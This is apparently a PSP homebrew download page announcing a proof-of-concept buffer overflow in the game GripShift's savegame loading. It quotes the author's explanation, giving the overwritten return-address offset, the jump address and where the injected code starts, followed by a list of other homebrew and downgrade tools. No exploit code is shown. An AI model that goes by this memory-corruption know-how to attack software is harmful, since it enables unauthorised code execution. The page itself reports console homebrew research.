Aah, yes, new exploit, old game. It's so cool to actually see this beauty working - and on a PSP-3000 no less! The PSP scene was buzzing the other day when MaTiAz found an exploit (read: buffer overflow!) in the three year old game, GripShift.
MaTiAz says that they've yet to find any further use for this, but it's still a new exploit. It could lead to further hacks, and for now, it's merely a proof of concept. Be that as it may, this is a great start, and a rather sweet find! Here's MaTiAz explaining the exploit:
GripShift has a buffer overflow vulnerability when loading savegames. The savegame contains the profile name which can be easily used to overwrite $ra. The savegame file is pretty big (25kB) so you have lots of space to put your code there. I wrote a simple blob of code to paint the framebuffer completely white (to just indicate that arbitrary code is running ). The return address is located at offset 0xA9 in the file. In this poc it points to 0x08E4CD50 (which is only a few bytes after the return address), and the code starts at 0xCC in the file.
It was tested on 4.01M33-2 with US version of GripShift (ULUS10040), and psplink.prx, usbhostfs.prx and deemerh.prx loaded (also without psplink and usbhostfs). The decrypted savegame (sorry, couldn't [be bothered to] get Shine's savegame tool working so it's in plaintext form) is in the SDDATA.BIN form which Hellcat's Savegame-Deemer produces (thanks to him, if the program didn't exist I wouldn't have bothered with this. ). Just copy the ULUS10040SAVE00 directory to /PSP/SAVEPLAIN/ and run the game. EDIT: yeah, don't forget to have Savegame-Deemer working, duh.
Like it? Share with your friends!
If you got an error while installing Themes, Software or Games, please, read FAQ.
Similar Software:
MacroFire Japanese developer pen is back on the scene to release a new version of MacroFire, a handy homebrew plugin that allows you to reassign the PSP buttons, adjust your analog stick's sensitivity and enable rapidfire mode, according to your desired taste
1.50 Helper (2.5 2.6 Downgrader Helper) 1.50 Helper (2.5 2.6 Downgrader Helper)
In case of passworded files (downdater files are) password is - I_USE_AT_MY_OWN_RISKS
Yes, you have read the title right - 2.50/2.60 Downgrader. Dark_Alex, along with Mathieulh and Yoshihiro from SonyXTeam, have released the first working 2.50/2.60 downgrader
Ultimate Pandora's Tool Ultimate Pandora's Tool
Latest version of UPT incorporating DC3, DC4, DC5 & DC7, WiFi downloads, updated UL, a modified version of DC7 to load Cory1492's excellent app nandTool 0.4 fully personalized for PSP4Noobz, a new firmware install look with progress bar as well as other functions.
UPTv5 will not run under the 1.50 Kernel, the minimum it has been tested on 3
AutoBoot Fixer AutoBoot Fixer
If you're having trouble trying to automatically run homebrew programs from your PlayStation Portable's BOOT directory, then you might find this latest plugin from developer Red_Squirrel quite useful. Entitled "AutoBoot Fixer", this homebrew plugin allows you to use the "Autorun program at /PSP/GAME/BOOT/EBOOT
Control Fan Utility 1.10: An Alexander Mod With Coolness in Mind Control Fan Utility 1.10: An Alexander Mod With Coolness in Mind - Following up on his Iris Manager release, Alexander is back with a small update to Control Fan Utility. Guess what? It supports CFW 4.50!
If you fear that your PS3 will one day be rendered useless by a YLOD, check out this awesome mod by Alexander
Ultimate VSH Menu Ultimate VSH Menu
After what he admits as "the worst release of Ultimate VSH Menu," Total_Noob is back with an update for Ultimate VSH Menu, complete with an apology for the crashes from the previous version.
This new v1.07 seeks to mend that with one big bulk of a changelog
BwE Nor Validator BwE Nor Validator
BwE is back with an important update to their NOR validation tool. Want to verify that system dump? This app is one of the best!
BetterWayElectronics told us not too long ago that they felt development for NOR Validator had just about finished. Apparently the team seems to have changed their minds and released this completely new version numbered at 1.30
Reboot for CIntro Reboot for CIntro
A couple of days ago, QJ tipster bruce33 sent us a note regarding a homebrew application called Recovery mode 3.40 from Playstation Portable (PSP) online site TeknoPSP. He sent us a note again today about another application from the same site. It's about Reboot for CIntro
FW2.50 TA-082 Check & Dump FW2.50 TA-082 Check & Dump
"maybe late i will make a software to let "FW2.50 TA-082" user to dump "NandFlash & DDR DRam" data to me than i can make the "FW1.00/1
multiMAN Tools multiMAN Tools
Have the new version of multiMAN designed to work with 4.46 CFW? Grab some updated plugins here!
Deank just recently updated his popular manager application to support the newly released 4.46 CFWs. Should you be a user in the new environment, you are going to need these updated plugins to get the most out of your backup loading experience
Comments on GripShift savegame exploit POC:
Comments not found
If you noted an error or download link is broken, please, report it via this page or use comments.
Please, select device to check if GripShift savegame exploit POC supports it
